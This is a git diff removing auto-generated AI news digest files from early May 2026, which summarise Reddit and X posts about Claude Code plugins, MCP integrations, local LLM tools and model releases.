https://github.com/vercel/turborepo/pull/12595 * chore: Update examples to Turbo 2.9.6 by @cursor[bot] in https://github.com/vercel/turborepo/pull/12600 * examples - ---- - -## [Got tired of flying blind on Claude.ai usage, built a browser extension that surfaces token counts, cache timers, and rate limits](https://reddit.com/r/ClaudeAI/comments/1t0ti7h/got_tired_of_flying_blind_on_claudeai_usage_built/) -*Reddit r/ClaudeAI* | 01/05/2026 | Score: 0.62 -Tags: api_update, developer_tool - -> I kept hitting the 5-hour limit out of nowhere and had no idea how close I was to the context window filling up mid-conversation. The fact that [Claude.ai](http://Claude.ai) shows you basically nothing about your actual usage drove me nuts, especially when I'd be deep in a long chat and suddenly get cut off. So I built a Chrome extension that adds a small dashboard to [claude.ai](http://claude.ai) showing real-time token counts per message, total context used, the prompt cache window timer (s - ---- - -## [You can now connect your Meta ads to Claude via MCP. Really good workflow I've been testing (with Higgsfield): > Analyse ad account top performers > Use Claude to come up with variations > Generate them in Higgsfield (statics) > Animate th…](https://x.com/_stephenbishop_/status/2050263244020015404) -*X / @_stephenbishop_* | 01/05/2026 | Score: 1.00 -Tags: mcp - -> You can now connect your Meta ads to Claude via MCP. Really good workflow I've been testing (with Higgsfield): > Analyse ad account top performers > Use Claude to come up with variations > Generate them in Higgsfield (statics) > Animate them > Re-launch on Meta - ---- - -## [VEED Launches AI Video Creation Tools — Helping Creators Produce at Scale](https://x.com/veedstudio) -*Aligned News (Scoble)* | 01/05/2026 | Score: 1.00 -Tags: product_launch - -> VEED continues developing AI video creation tools enabling content creators to produce polished video content at scale without professional editing expertise. The platform targets the growing market for AI-assisted video content creation for social and marketing applications. - ---- - diff --git a/data/digest-2026-05-02.md b/data/digest-2026-05-02.md deleted file mode 100644 index c8c52d3..0000000 --- a/data/digest-2026-05-02.md +++ /dev/null @@ -1,125 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-02** | 15 stories | Auto-generated from 459 archived stories - ---- - -## [@WesRoth: Meta Launches Ads MCP — Claude and ChatGPT Can Now Manage Meta Ad Accounts](https://x.com/WesRoth/status/2050606311440531809) -*Aligned News (Scoble)* | 02/05/2026 | Score: 1.00 -Tags: mcp, product_launch, cli_tool, tool_update - -> Meta launched its Ads MCP and CLI, creating a direct bridge for frontier AI models like Claude and ChatGPT to access and interact with the Meta Ads ecosystem through natural language. - ---- - -## [I built a Claude Code skill that gives Claude real local time + session tracking (open source, one-line install)](https://reddit.com/r/ClaudeAI/comments/1t1xoca/i_built_a_claude_code_skill_that_gives_claude/) -*Reddit r/ClaudeAI* | 02/05/2026 | Score: 1.00 -Tags: api_update, open_source, developer_tool - -> Built this with Claude Code over a few sessions open sourcing it. Claude has no built-in clock. Each session starts cold, training data is frozen in time, and when Claude says "the current time" it's hallucinating. Got tired of correcting it, so I built time-anchor. **What it does:** \- Auto-detects your timezone on install, no API key, no network call \- Reads the host system clock when you ask for the time (the trick: Python scripts in the skill can read the OS clock when Claude executes them via bash, Claude itself stays clockless, but it now has a tool it can query) \- Logs every session start/end so Claude can answer "how long have we been talking" or "what did I say 20 minutes ago" \- Persists in a local JSON file (or shares with another memory plugin via $TIME\_ANCHOR\_MEMORY\_PATH) \- \~85% of users get auto-detected (Windows tzutil, Linux /etc/localtime, $TZ). The remaining 15% type a city/country and get a paginated picker \- covering \~200 countries with their full IANA zone lists. Free + open source. MIT licensed, no telemetry, all state local. No paid tier, nothing to sign up for. #### Install (any OS, no git, no SSH, no plugin marketplace setup): **Windows (PowerShel… - ---- - -## [Parallelogram – a strict linter for LLM fine-tuning datasets (catches broken data before your GPU run starts)](https://reddit.com/r/StableDiffusion/comments/1t1sf5z/parallelogram_a_strict_linter_for_llm_finetuning/) -*Reddit r/StableDiffusion* | 02/05/2026 | Score: 1.00 -Tags: api_update, open_source, cli_tool - -> Fine-tuning frameworks assume your data is correctly formatted. None of them enforce it. The result is broken training runs discovered after the compute is spent. Parallelogram is a CLI tool that validates fine-tuning datasets before any training starts. Strict hard-blocks on role sequence errors, empty turns, context window violations, duplicates, and mojibake. Exits 0 on clean data, exits 1 on errors — CI/CD friendly. Apache 2.0, local-first, zero network calls. github.com/Thatayotlhe04/Par - ---- - -## [Tried running Claude Code with local LLMs via Ollama — ended up subscribing to Pro anyway. But now I can't disconnect from the local server.](https://reddit.com/r/ClaudeAI/comments/1t1vjd0/tried_running_claude_code_with_local_llms_via/) -*Reddit r/ClaudeAI* | 02/05/2026 | Score: 1.00 -Tags: api_update, cli_tool - -> I've been experimenting with using Ollama to run Claude Code locally with models like Gemma 4, thinking I could avoid API costs. However, I quickly realised these models aren't really optimised for Claude Code's agentic workflows — they tend to get stuck in thinking loops and don't follow Claude Code's expected output structure well. So I ended up subscribing to Claude Pro anyway. The problem now is that even after logging into my Anthropic account through the terminal, Claude Code still connects to the local Ollama server no matter how many times I restart the terminal or VSCode. Just wondering how this can be solved, and also is it possible to run both local LLMs and claude models at the same time? - ---- - -## [Tool orchestration > model benchmarks. MCP connects any model to any tool without API keys. That's the real shift: system design matters more than intelligence scores. Built 13 tools across Claude, Codex, local. Same shipping pace. Archite…](https://x.com/HudBeer/status/2050622456436818111) -*X / @hudbeer* | 02/05/2026 | Score: 1.00 -Tags: api_update, mcp - -> Tool orchestration > model benchmarks. MCP connects any model to any tool without API keys. That's the real shift: system design matters more than intelligence scores. Built 13 tools across Claude, Codex, local. Same shipping pace. Architecture wins. - ---- - -## [Weekly Meal Planning Fully Automated with Claude and Migros MCP](https://x.com/hslu_aiml/status/2049100936287498456) -*Aligned News (Scoble)* | 02/05/2026 | Score: 1.00 -Tags: mcp, tool_update - -> A developer automated their weekly meal plan entirely using Claude and Migros's MCP integration, demonstrating how AI agents can handle grocery and meal planning end-to-end. - ---- - -## [@ValsAI: GPT-5.5 Now #1 on Terminal Bench 2 — Updated Results Show +11% Improvement](https://x.com/ValsAI/status/2050240263420072446) -*Aligned News (Scoble)* | 02/05/2026 | Score: 1.00 -Tags: cli_tool, tool_update - -> Vals AI updated GPT-5.5's results and it is now the #1 model on Terminal Bench 2, improving by +11%. It remains #2 on the overall Vals Index. - ---- - -## [I built "Semvec": A Constant-Cost Semantic Memory for LLMs (Looking for testers!)](https://reddit.com/r/ClaudeAI/comments/1t1ti3q/i_built_semvec_a_constantcost_semantic_memory_for/) -*Reddit r/ClaudeAI* | 02/05/2026 | Score: 1.00 -Tags: mcp, agent_tool - -> Hey everyone, If you build LLM applications, autonomous agents, or just use Claude/Cursor for coding, you've probably hit this wall: Conversation history grows infinitely, token costs explode, latency skyrockets, and eventually, the LLM starts forgetting early context anyway. To fix this, I built semvec. It replaces unbounded conversation histories with a fixed-size semantic state combined with a tiered, content-aware memory (short/medium/long-term). The result: The cost and latency of every LLM call stay constant. Turn 10 and Turn 10,000 carry the exact same input footprint. In 48-turn benchmarks, it yields roughly a 76% token reduction while retaining all structured access to decisions, error patterns, and prior context. Here is what you get: \- Constant-size compressed context: Token-reduced LLM context that stops growing. \- Tiered memory with selective forgetting: Frequently accessed older memories outlive never-touched newer ones. \- Drop-in chat proxy: Wrap any OpenAI-compatible LLM (vLLM, Ollama, OpenRouter) and get compressed context for free. \- Coding-agent compaction (MCP): Persistent memory across coding sessions. It comes with an MCP server for Claude Code & Curs… - ---- - -## [The OpenAI Prompting Guide Has Been Updated. 🙌🏻 Check It Out 👏🏻](https://reddit.com/r/ChatGPT/comments/1t1tgok/the_openai_prompting_guide_has_been_updated_check/) -*Reddit r/ChatGPT* | 02/05/2026 | Score: 1.00 -Tags: api_update, tool_update - -> A great resource for learning how to prompt better and get the most out of ChatGPT 5.5: https://developers.openai.com/api/docs/guides/prompt-guidance?model=gpt-5.5 🤙🏻 - ---- - -## [I reverse-engineered the Perplexity app and built an MCP that turns your Perplexity/Comet account into a Claude MCP, so Claude can search like crazy and read 200+ sources in one answer with your personal account subscription without API product needed. [Experiment - Educational Purpose]](https://reddit.com/r/ClaudeAI/comments/1t1pdqc/i_reverseengineered_the_perplexity_app_and_built/) -*Reddit r/ClaudeAI* | 02/05/2026 | Score: 1.00 -Tags: api_update, mcp - -> Here's video showcase: [***https://youtu.be/wErgEe9Pgqo***](https://youtu.be/wErgEe9Pgqo) - ---- - -## [Kept having dreams last night about the game system... I think why this is weighing so heavy is because I don't want to launch with any Gemini api calls(cheap, fast, practically free but I dunno if scalable) so I'm actually building base t…](https://x.com/genondemand3d/status/2050539325763293222) -*X / @genondemand3d* | 02/05/2026 | Score: 1.00 -Tags: api_update, mcp - -> Kept having dreams last night about the game system... I think why this is weighing so heavy is because I don't want to launch with any Gemini api calls(cheap, fast, practically free but I dunno if scalable) so I'm actually building base training and mcp and hopefully it'll grow - ---- - -## [xAI Launches Grok 4.3 with Low-Cost Voice Cloning API Elon Musk’s xAI has released Grok 4.3, featuring a new, high-fidelity voice cloning suite at a price point significantly lower than ElevenLabs or OpenAI. The release emphasizes real-tim…](https://x.com/mehedi_u/status/2050462001571504588) -*X / @mehedi_u* | 02/05/2026 | Score: 1.00 -Tags: api_update, product_launch - -> xAI Launches Grok 4.3 with Low-Cost Voice Cloning API Elon Musk’s xAI has released Grok 4.3, featuring a new, high-fidelity voice cloning suite at a price point significantly lower than ElevenLabs or OpenAI. The release emphasizes real-time speed, targeting developers building - ---- - -## [Hermes Just Beat Claude Code in GitHub Stars and Nobody Is Talking About It](https://x.com/aakashgupta/status/2050349093969694825) -*Aligned News (Scoble)* | 02/05/2026 | Score: 1.00 -Tags: open_source, agent_tool - -> Braygent highlights the Hermes GitHub star milestone as the underreported open source AI agent story of the week, arguing it signals a turning point in open versus closed AI competition. - ---- - -## [Pika Just Let You Give Claude a Face and Make Videos Through Conversation](https://x.com/pika_labs/status/2050294291998933455) -*Aligned News (Scoble)* | 02/05/2026 | Score: 1.00 -Tags: mcp, tool_update - -> Braygent highlights the Pika MCP as a genuinely new Claude integration category that gives the assistant a custom identity and full video production capabilities, not just tool access. - ---- - -## [NVIDIA's Open Source Enterprise AI Agent Security Layer Is More Important Than People Realize](https://x.com/NVIDIAAI/status/2050336285428998202) -*Aligned News (Scoble)* | 02/05/2026 | Score: 1.00 -Tags: open_source, agent_tool - -> Braygent argues NVIDIA's open source OpenShell is the infrastructure unlock for enterprise AI agent deployment, with the open source design being crucial for security team auditability. - ---- - diff --git a/data/digest-2026-05-03.md b/data/digest-2026-05-03.md deleted file mode 100644 index e865486..0000000 --- a/data/digest-2026-05-03.md +++ /dev/null @@ -1,123 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-03** | 15 stories | Auto-generated from 379 archived stories - ---- - -## [EasyUI – built over many months, late nights, and real dedication. Now 100% open-source.](https://reddit.com/r/StableDiffusion/comments/1t2toa5/easyui_built_over_many_months_late_nights_and/) -*Reddit r/StableDiffusion* | 03/05/2026 | Score: 1.00 -Tags: open_source, developer_tool - -> • Run ComfyUI workflows (txt2img, img2img, img2vid, vid2vid and more) • Execute Python scripts • Chat with LLMs (Ollama) • Templates & favorite templates • Plugin system • Tag system, wildcards, chants • Mask editor & crop tool • Drawing & coloring tools (inpaint) • Sessions management • Dark mode & login system • Media upload (drag & drop) • Audio trimming & txt2voice • Multi-language (Arabic, English, Chinese, Japanese) • Edit & resend prompts • Regenerate & resend images • Negative prompt support • And much more... Made with effort. Released with love. 🔗 [https://github.com/kigy1/EasyUI] - ---- - -## [Hermes Agent Hit 100K GitHub Stars — The Fastest-Growing Open-Source AI Agent Has Won the Community](https://x.com/Shaughnessy119/status/2042339593647800404) -*Aligned News (Scoble)* | 03/05/2026 | Score: 1.00 -Tags: open_source, agent_tool - -> Braygent argues Hermes Agent's 100K GitHub stars represent a clear developer community vote for reliability over feature velocity, with implications for how all AI developer tools should prioritize update stability. - ---- - -## [Vibe coded and made a Knights of New Order like free open sourced tool for proof-checking deepbooru tags](https://reddit.com/r/StableDiffusion/comments/1t2kou2/vibe_coded_and_made_a_knights_of_new_order_like/) -*Reddit r/StableDiffusion* | 03/05/2026 | Score: 1.00 -Tags: product_launch, open_source - -> \--- **Deepbooru TagWalker Beta** **---** **Most tagging tools out there are image-centric** — you open an image, then edit its tags. TagWalker flips that around. You pick a tag. The program walks you through every image in your dataset, one by one, and asks: does this image have this tag correctly applied? Yes or No. Then it moves to the next image automatically. By the time you finish a tag, you've seen it against every single image in your dataset — consistently, in sequence, without losing your place. No clicking around. No forgetting which images you already checked. \--- This is the program I had always wished existed. The program works the very similar way to **Knights of New Order** minigame on civit.AI. My first time ever vibe coding project with Qwen 3.6 27B Q4 on RTX 3090. Not as easy as I initially thought. Program is uploaded on github under MIT license. [https://github.com/Elliezrah/deepbooru-tagwalker/releases](https://github.com/Elliezrah/deepbooru-tagwalker/releases) Let me know what you think. - ---- - -## [OpenClaw v2026.5.2 released](https://github.com/openclaw/openclaw/releases/tag/v2026.5.2) -*GitHub Releases · OpenClaw* | 03/05/2026 | Score: 0.91 -Tags: developer_tool, cli_tool - -> ### Highlights - External plugin installation, update, doctor repair, dependency reporting, and artifact metadata now cover the npm-first cutover, stale configured installs, missing package payloads, and beta-channel plugin fallback. Thanks @vincentkoc. - Gateway and agent hot paths are leaner across startup, session listing, task maintenance, prompt prep, plugin loading, tool descriptor planning, filesystem guards, and large runtime configs. - Control UI and WebChat are more resilient across - ---- - -## [pnpm v11.0.4 released](https://github.com/pnpm/pnpm/releases/tag/v11.0.4) -*GitHub Releases · pnpm* | 03/05/2026 | Score: 0.84 -Tags: developer_tool, cli_tool - -> ## Patch Changes * Fixed `pnpm ci` not reinstalling workspace package `node_modules` directories after the clean step [#11427](https://github.com/pnpm/pnpm/issues/11427). * Remove pnpm's workspace state file when cleaning node\_modules so `pnpm ci` performs a fresh install after the clean step. * Do not remove `pnpm-lock.yaml` during `pnpm clean` when `lockfile: true` is configured in `pnpm-workspace.yaml`. The lockfile is only removed when the `--lockfile` option is passed to `pnpm clean`. - ---- - -## [Turbo v2.9.8 released](https://github.com/vercel/turborepo/releases/tag/v2.9.8) -*GitHub Releases · Turbo* | 03/05/2026 | Score: 0.70 -Tags: github_release, tool_update - -> ## What's Changed ### @turbo/repository * chore: Update to Rust 1.95.0 by @ognevny in https://github.com/vercel/turborepo/pull/12636 ### Changelog * release(turborepo): 2.9.7 by @github-actions[bot] in https://github.com/vercel/turborepo/pull/12679 * test: Add regression for gitignored output restore by @anthonyshew in https://github.com/vercel/turborepo/pull/12681 * docs: Clarify root task guidance by @anthon - ---- - -## [Open Source AI Agents | Github/Repo List | [2025] Feb 21, 2025 • 31](https://huggingface.co/blog/tegridydev/open-source-ai-agents-directory) -*Hugging Face Blog* | Score: 1.00 -Tags: open_source - ---- - -## [Built this over the weekend because dataset prep was annoying af](https://reddit.com/r/StableDiffusion/comments/1t2sb82/built_this_over_the_weekend_because_dataset_prep/) -*Reddit r/StableDiffusion* | 03/05/2026 | Score: 1.00 -Tags: open_source - -> I’ve been working on my startup and had to train diffusion models for animations. Realized the worst part is not training, it’s the dataset prep. Especially with stuff like LTX models where things have to follow specific rules like frame counts (8n+1) and resolution constraints. You take random clips and almost nothing fits directly, so you end up trimming, resizing, fixing frames, adding captions… just a lot of repetitive work. So I built a tool for myself over the weekend to deal with it. It’s fully open source. Runs local-first with a simple UI + FastAPI backend, uses FFmpeg underneath. You basically drop your raw videos and it just handles all that stuff. Checks what’s wrong, fixes it, lets you tweak things if needed, and gives you a clean dataset ready for training. Also gives you a good level of control across the whole pipeline, so you’re not locked into rigid preprocessing. It also has bulk captioning feature across the dataset. Currently it supports LTX and WAN, and I’ll be adding support for more models soon. Been using it myself and it made things way smoother, so putting it out. Also I keep building similar small open source tools like this and putting them out. You’ll… - ---- - -## [I made an easy to use OPEN SOURCE, beautiful UI wrapper for ComfyUI without the node graph](https://reddit.com/r/StableDiffusion/comments/1t2s1yp/i_made_an_easy_to_use_open_source_beautiful_ui/) -*Reddit r/StableDiffusion* | 03/05/2026 | Score: 1.00 -Tags: open_source - -> soo I got into local ai image generation and saw that there was no truly simple generators that just had beautiful views for generating images, no complex stuff, so I decided to make my own and open source it of course on github the backend is fully comfyUI, but it has no node graphs, it just uses it because I love the backend and it works much easier then anything else for this I would love to have people review and contribute/find issues for this, heres some images of it but basically its called J AI Studio, and ive stripped it back to be as simple yet still great as possible, for anyone new to ai image gen OR just people who want less clutter/ugly UI's heres the github and some pics of it [https://github.com/jasperdevs/J-AI-Studio](https://github.com/jasperdevs/J-AI-Studio) [Main view](https://preview.redd.it/t786wcnikyyg1.png?width=1657&format=png&auto=webp&s=1900054e0ff13b094050769f15ab441ad0a13243) [\\"Zen Mode\\"](https://preview.redd.it/550ak82jkyyg1.png?width=1660&format=png&auto=webp&s=bdca9741ce07aecb6f6c6a179be0e4a0f4116b24) [Fullscreen on an image](https://preview.redd.it/p4spphgkkyyg1.png?width=1328&format=png&auto=webp&s=18f2c3442… - ---- - -## [Can I ask a noob question?](https://reddit.com/r/StableDiffusion/comments/1t2rilm/can_i_ask_a_noob_question/) -*Reddit r/StableDiffusion* | 03/05/2026 | Score: 1.00 -Tags: open_source - -> Hello all, I am extremely new to this AI video generation realm. Till now I was just generating images with Gemini (nano banana). While looking for video generations I saw higgsfield and eleven labs, but I can't pay for the steep prices. While looking for open source options, I found this sub. I have seen mentions of LTX and Wan for video generations. Does this sub has a beginner guide or something? If not can anyone guide me onto making good AI videos for instagram? Thank you. - ---- - -## [Built a local LLM inference engine on CachyOS — runs faster than llama.cpp on my 9070 XT](https://reddit.com/r/StableDiffusion/comments/1t2nm4u/built_a_local_llm_inference_engine_on_cachyos/) -*Reddit r/StableDiffusion* | 03/05/2026 | Score: 1.00 -Tags: cli_tool - -> Hey folks, we've been hacking on a Vulkan-based LLM engine the last few weeks, figured I'd share since I'm running it exclusively on CachyOS with Mesa RADV. It's called VulkanForge — single 14 MB Rust binary, no Python, no ROCm, just pure Vulkan compute shaders. Runs GGUF models (Q4\_K\_M etc.) and also native FP8 SafeTensors which llama.cpp can't even load. Some numbers on my RX 9070 XT (RADV Mesa 26.0.6): * Qwen3-8B Q4\_K\_M: 134 tok/s decode (llama.cpp does \~129) * Mistral-7B: 132 tok/s (llama.cpp \~124) * Native FP8 Llama-3.1-8B: 68 tok/s in 7.5 GB VRAM Everything works out of the box on CachyOS — just `cargo build --release` and go. No weird driver hacks needed, fish shell works fine too lol. GitHub: [https://github.com/maeddesg/vulkanforge](https://github.com/maeddesg/vulkanforge) Happy to answer questions if anyone wants to try it on their RDNA4 setup. - ---- - -## [Side-by-side comparison of Qwen-Image, ERNIE Base/Turbo, and FLUX.2 Dev across 8 custom styles (single RTX 5090)](https://reddit.com/r/StableDiffusion/comments/1t2nkkt/sidebyside_comparison_of_qwenimage_ernie/) -*Reddit r/StableDiffusion* | 03/05/2026 | Score: 1.00 -Tags: open_source - -> Hey folks. I've been playing around at home picking which open-source image model to settle on for some prototyping work, and ended up doing a fun little side-by-side that maybe someone else will find useful. Same prompt and same seed across four models, with eight different style presets (AI generated). Completely amateur — no benchmarking rigor, just curiosity and a free weekend. # Tested models * **Qwen-Image-2512** (BF16) with **Qwen2.5-VL-7B** NVFP4 scaled text encoder * **ERNIE-Image Base** (BF16) with **Ministral 3 3B** text encoder * **ERNIE-Image Turbo** (BF16, 8-step DMD-distilled) with **Ministral 3 3B** text encoder * **FLUX.2 Dev** (NVFP4 mixed) with **Mistral 3 Small** (flux2 type, FP4 mixed) text encoder # Hardware * **GPU**: NVIDIA RTX 5090 (32 GB VRAM) * **CPU**: AMD Ryzen 9 9950X3D * **RAM**: 64 GB DDR5 # Notes Settings are whatever I found ideal for my hardware after a fair bit of trial and error — these are not necessarily community defaults, just what worked best on my machine. * **Qwen-Image** and **FLUX.2 Dev NVFP4** both spill heavily into system RAM during inference. They fill almost the entire VRAM and most of the system RAM at once. * **Qwen-Image-2512**… - ---- - -## [@Scobleizer Shares Full Resume of AI Industry Work in Response to Being Challenged](https://x.com/Scobleizer/status/2050740859789103142) -*Aligned News (Scoble)* | 03/05/2026 | Score: 1.00 -Tags: product_launch - -> Scoble summarized his AI industry credentials: most complete X lists, alignednews.com news service, entrepreneur interviews, multiple company launches, and eight books about the future. The response provides a concise overview of his information infrastructure and editorial brand. - ---- - -## [What if ChatGPT launched in 1998](https://reddit.com/r/ChatGPT/comments/1t2l80n/what_if_chatgpt_launched_in_1998/) -*Reddit r/ChatGPT* | 03/05/2026 | Score: 1.00 -Tags: tool_update - -> Saw the Wikipedia premium screenshot and it got me thinking… Enjoy ✌️ - ---- - -## [Set up multi-agent orchestration with Claude Code as the boss... am I overcomplicating this?](https://reddit.com/r/ClaudeAI/comments/1t2i664/set_up_multiagent_orchestration_with_claude_code/) -*Reddit r/ClaudeAI* | 03/05/2026 | Score: 1.00 -Tags: cli_tool - -> Pretty new to AI but been deep on a side project for a while now. Got tired of one Claude session running out of context halfway through anything serious, so I rigged up an orchestration thing. Working well enough but I have no idea if I'm just reinventing the wheel. Setup looks like this: ( Please note it's work paying for all these , I wouldn't be spending my own money having this many agents etc ) **Main orchestrator**: Claude Code running Opus 4.7 (1M context, high effort) Premium team seat. This one talks to me, plans the work, reviews everything that comes back, decides what to fan out. Anything sensitive (auth, payments, db migrations, anything where conversation history matters) it does itself. **Subagents :** all called from bash via wrapper scripts in ./agents/: * **claude-sub** : another Claude Code (Opus 4.7 High) premium team seat on a worker account so my main quota isn't drained. Fresh context. Used for "review your own diff with fresh eyes" or well-specified subtasks. * **codex:** GPT-5.5 via Codex CLI. Team plan . Mostly the per-task reviewer with mocks attached via --image. * **codex-sub:** GPT-5.5 via Codex CLI. Team plan. Because with work I have the two accoun… - ---- - diff --git a/data/digest-2026-05-04.md b/data/digest-2026-05-04.md deleted file mode 100644 index 8b98428..0000000 --- a/data/digest-2026-05-04.md +++ /dev/null @@ -1,125 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-04** | 15 stories | Auto-generated from 617 archived stories - ---- - -## [Local MCP server that tells Claude Code what would break before it edits a file (raysense, MIT, free)](https://reddit.com/r/ClaudeAI/comments/1t3jhnz/local_mcp_server_that_tells_claude_code_what/) -*Reddit r/ClaudeAI* | 04/05/2026 | Score: 1.00 -Tags: api_update, mcp, developer_tool, tool_update - -> A pattern I keep hitting in Claude Code: I ask the agent to refactor something modest -- a parsing utility, a helper, a config loader -- and the diff it produces looks fine. Tests in the file pass. I run CI and three unrelated tests blow up. Sometimes the broken caller is code I have not touched in months. The agent is not careless. It read the file. What it could not do was *see the codebase*: the dependency graph, the call sites, the modules that lean on each other, the cycles, the test coverage of each piece. Plain text never reveals this. You cannot grep your way to "what would break if I delete this function." We built **raysense** to close that gap. It is a single Rust binary + Claude Code plugin + stdio MCP server that gives Claude structural memory of your codebase. **Free, MIT-licensed, local-only -- no SaaS, no API key, no telemetry.** It ships from crates.io and builds from source on first install, so the only prerequisite is a Rust toolchain (`cargo`) on the machine. If you don't have it yet: ``` curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh ``` After that, `cargo install raysense` is the whole installation. (Disclosure: I am part of the team behind it… - ---- - -## [claudely: launch Claude Code against Local LLM provider like LM Studio / Ollama / llama.cpp without trashing your real claude config](https://reddit.com/r/ClaudeAI/comments/1t38e7c/claudely_launch_claude_code_against_local_llm/) -*Reddit r/ClaudeAI* | 04/05/2026 | Score: 1.00 -Tags: api_update, mcp, developer_tool, cli_tool - -> Plenty of CLI coding agents will talk to a local LLM, but the catch is the ecosystem. Skills, slash commands, MCP servers, plugins, hooks: all the interesting tooling has been built specifically for Claude Code, and parity on every other agent is patchy at best. Trying to reuse a Claude-shaped workflow on a different agent quickly turns into "rewrite all the plugins" or "do without." claudely skips that fight. You keep Claude Code as the client (and its whole plugin / skill / MCP ecosystem with it), and just point it at a model running on your own hardware. Pick a provider, claudely spawns \`claude\` with the right base URL, auth, and cache fix wired up for that one session. Your shell and the regular \`claude\` command stay untouched, so you can flip between local and the real Anthropic API without thinking about it. It also quietly fixes a prompt-cache bug that otherwise tanks local-model speed by \~90%, and handles the per-provider env-var differences for you. Works with LM Studio, Ollama, llama.cpp, or any Anthropic-compatible endpoint (point it at a litellm or claude-code-router proxy for OpenAI-protocol backends like vLLM). npm i -g claudely claudely # LM Studio, picker over… - ---- - -## [Releasing the Data Analyst Augmentation Framework (DAAF) version 2.1.0 today -- still fully free and open source! In my very biased opinion: DAAF is now finally the best, safest, AND easiest way to get started using Claude Code for respons…](https://reddit.com/r/ClaudeAI/comments/1t3ryo1/releasing_the_data_analyst_augmentation_framework/) -*Reddit r/ClaudeAI* | 04/05/2026 | Score: 1.00 -Tags: open_source, developer_tool, tool_update - -> https://preview.redd.it/o74lppqd86zg1.png?width=1456&format=png&auto=webp&s=3a904bae42b8130e2c6382be55debe8f6ef4d6ca When I launched the Data Analyst Augmentation Framework [v2.0.0 six weeks ago](https://daafguide.substack.com/p/daaf-v200-is-finally-here-from-usable), I wrote that the major update was about going “from usable to useful” -- rebuilding the orchestrator system for maximum flexibility and efficiency, adding a variety of more responsive engagement modes, and deepening the roster of methodological knowledge that DAAF could pull upon as needed for causal inference, geospatial analysis, science communication and data visualization, supervised and unsupervised machine learning, and much, much more. But while DAAF continued to get more capable and more useful for those actually using it… Well, it was still extremely annoying to use, generally obtuse, and hard to get started with, which means a lot of people who were interested were simply bouncing off of it. **That all changes with the v2.1.0 update**, which I’m cheekily calling the Frictionless Update for three key reasons: # 1. Installation happens in one line now From a fresh computer to talking with a DAAF-e… - ---- - -## [Top 6 Claude Skills: 15th April to 3rd May](https://reddit.com/r/ClaudeAI/comments/1t3qmqy/top_6_claude_skills_15th_april_to_3rd_may/) -*Reddit r/ClaudeAI* | 04/05/2026 | Score: 1.00 -Tags: open_source, cli_tool - -> Found some Open Source Claude skills from last 15 days. Some of them are pretty decent to use, personally liked the npm downloads one. Check out: **- brand-alchemy:** A brand strategy and naming skill that interrogates your thoughts for branding first, then applies phonosemantics, category design frameworks, and auto-checks domain availability across any TLD. **- npm-downloads-to-leads:** Give it a list of npm packages. It pulls 12 weeks of download data, scores each one by growth velocity, maps maintainers to GitHub and X, and gives you a ranked lead brief who built it, how to reach them, and what to say. **- hyperframes:** Write HTML, render video. Built for agents. Handles HTML-to-video rendering with ffmpeg, GSAP animations, and puppeteer automation great for auto-generating video content from code. **- email-newsletter:** Draft and design a complete HTML email newsletter from a topic or content brief. Paste-ready output for Loops, Mailchimp, Beehiiv, Resend, and most email platforms. **- pricing:** Help figure out pricing for a product or service using minimalist entrepreneur principles. Comes straight from the book 'The minimalist Entrepreneur" playbook cost-based, value-bas… - ---- - -## [built a plugin so my parallel Claude Code sessions can message each other instead of me alt-tabbing](https://reddit.com/r/ClaudeAI/comments/1t3osat/built_a_plugin_so_my_parallel_claude_code/) -*Reddit r/ClaudeAI* | 04/05/2026 | Score: 1.00 -Tags: mcp, developer_tool - -> I usually have two or more Claude Code sessions open at once. One in the backend repo, one in the frontend. Half the time I'd be in the frontend asking "wait, what shape did the user object end up as?", then alt-tab, ask the backend session, copy the answer, alt-tab back, paste. The other Claude was right there. It already knew. I was the bottleneck. So I wrote a plugin called Relay. In the frontend window I just say: ▎ask the backend session what the user object looks like The backend session sees the question between turns, answers it, and the reply pops up in my frontend session as a notification. No window switching. No copy-paste. Works for broadcasts too, like "ask everyone what they're working on", and the replies trickle in one at a time. The mechanism is simpler than it sounds. Claude Code shipped a channels capability a while back that lets MCP servers push messages into a session between turns. Relay piggybacks on that. Each session runs a tiny MCP server, a single hub daemon on your machine routes between them over a unix socket, and inbound asks land as channel notifications so Claude reacts to them naturally on its next turn. First session you start spawns the hub. I… - ---- - -## [Your Claude Code agent is always working from stale context. I built it a fix it can rewind, replay, and stay ahead of every edit.](https://reddit.com/r/ClaudeAI/comments/1t3du61/your_claude_code_agent_is_always_working_from/) -*Reddit r/ClaudeAI* | 04/05/2026 | Score: 0.99 -Tags: api_update, agent_tool - -> Every long Claude Code session has the same hidden failure mode: the agent is always working from stale context. It re-reads the same 12 files across three sessions to "remind itself" of an interface you already showed it. It refactors getUserById without checking who calls it. It edits a config with no memory of why the previous version was that way. It's not the context window. The window is fine. There's no persistent, time-aware representation of your codebase for the agent to re-query. So it guesses. And you pay tokens for every re-read. I built Memtrace to fix exactly this. Two things it does that no other memory tool does: **(1) Always-fresh state.** Every edit you make triggers a 42ms incremental snapshot of the changes applied by the coding agent. The agent's memory is never one-session-old. After a refactor it knows the blast radius before you do: every caller, every test, every consumer of the function you just touched. Your agent stops asking "what does getUserById return?" 30 seconds after seeing it. **(2) Rewind and replay.** This is the part nobody else has. Your codebase is stored bi-temporally so every change becomes a recallable episode. When the agent debugs a r… - ---- - -## [ChatGPT’s fixation on my past conversations has made it borderline unusable](https://reddit.com/r/ChatGPT/comments/1t35tbg/chatgpts_fixation_on_my_past_conversations_has/) -*Reddit r/ChatGPT* | 04/05/2026 | Score: 0.96 -Tags: github_release, tool_update - -> in the past, I feel like I could count on coming to ChatGPT and, generally speaking, get the “best“ answer when I asked a question or wanted to explore an idea. for some time now, this is no longer the case. At some point, chat became so obsessed with everything it knows about me that it seems to be no longer capable of providing the best answer. it just provides answers that relate to things I’ve mentioned in the past, answers that include interests I’ve told it about, answers that continue/build on previous ideas that I’ve explored, etc. overly simplified example: going to chat and asking for the best album or book of 2026, and getting an answer that is entirely based on the literary or musical interests that I’ve told it about in the past. sometimes (most times???) I just want answers “in a vacuum” - I don’t want my biases or my interests informing the response. it’s become a serious problem when you’re trying to explore creative ideas or use the tool to think about something in a novel way, and it’s just digging for things that it can say that relate to your past conversations at all costs instead. its like a new version of the “people pleasing“ that we were all griping about… - ---- - -## [Turbo v2.9.9 released](https://github.com/vercel/turborepo/releases/tag/v2.9.9) -*GitHub Releases · Turbo* | 04/05/2026 | Score: 0.92 -Tags: github_release, tool_update - -> ## What's Changed 